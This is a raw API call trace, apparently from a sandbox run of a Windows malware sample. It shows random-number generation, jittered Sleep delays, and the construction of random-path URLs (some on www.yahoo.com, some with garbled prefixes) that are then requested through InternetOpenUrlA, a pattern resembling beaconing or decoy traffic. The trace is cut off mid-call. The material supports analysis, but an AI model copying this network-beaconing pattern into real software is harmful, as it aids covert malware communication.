GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0254.315] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0254.315] Sleep (dwMilliseconds=0x162fb) [0254.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0254.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.535] GetProcessHeap () returned 0x440000 [0254.535] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54b0 [0254.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54b1, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x4f54b1) returned 0x0 [0254.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0254.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0254.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.545] GetProcessHeap () returned 0x440000 [0254.545] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0254.545] lstrcpyA (in: lpString1=0x472900, lpString2="R\x17ì\x83s://www.yahoo.com" | out: lpString1="R\x17ì\x83s://www.yahoo.com") returned="R\x17ì\x83s://www.yahoo.com" [0254.545] lstrcatA (in: lpString1="R\x17ì\x83s://www.yahoo.com", lpString2="/a8WiyRfCsrre9j4aVg82xyo5ryyfubeki1I/" | out: lpString1="R\x17ì\x83s://www.yahoo.com/a8WiyRfCsrre9j4aVg82xyo5ryyfubeki1I/") returned="R\x17ì\x83s://www.yahoo.com/a8WiyRfCsrre9j4aVg82xyo5ryyfubeki1I/" [0254.545] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0254.545] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="R\x17ì\x83s://www.yahoo.com/a8WiyRfCsrre9j4aVg82xyo5ryyfubeki1I/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0254.546] GetProcessHeap () returned 0x440000 [0254.546] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0254.546] GetProcessHeap () returned 0x440000 [0254.546] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54b0 | out: hHeap=0x440000) returned 1 [0254.547] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0254.547] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0254.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0254.548] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0254.791] Sleep (dwMilliseconds=0x17d38) [0254.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0254.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.948] GetProcessHeap () returned 0x440000 [0254.948] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5570 [0254.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0254.948] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5571, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x4f5571) returned 0x0 [0254.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.949] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.951] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0254.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0254.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0254.955] GetProcessHeap () returned 0x440000 [0254.955] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473140 [0254.955] lstrcpyA (in: lpString1=0x473140, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0254.955] lstrcatA (in: lpString1="\x04", lpString2="/1yzeg2ec7crW7ux2agjicpZyIxls5cEu451crfR/" | out: lpString1="\x04/1yzeg2ec7crW7ux2agjicpZyIxls5cEu451crfR/") returned="\x04/1yzeg2ec7crW7ux2agjicpZyIxls5cEu451crfR/" [0254.956] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0254.956] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/1yzeg2ec7crW7ux2agjicpZyIxls5cEu451crfR/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0254.956] GetProcessHeap () returned 0x440000 [0254.956] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473140 | out: hHeap=0x440000) returned 1 [0254.956] GetProcessHeap () returned 0x440000 [0254.956] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5570 | out: hHeap=0x440000) returned 1 [0254.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0254.956] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0254.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0254.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0254.957] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0254.957] Sleep (dwMilliseconds=0x16462) [0255.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0255.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.128] GetProcessHeap () returned 0x440000 [0255.128] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02250 [0255.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.128] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02251, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a02251) returned 0x0 [0255.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.129] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.129] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.132] GetProcAddress 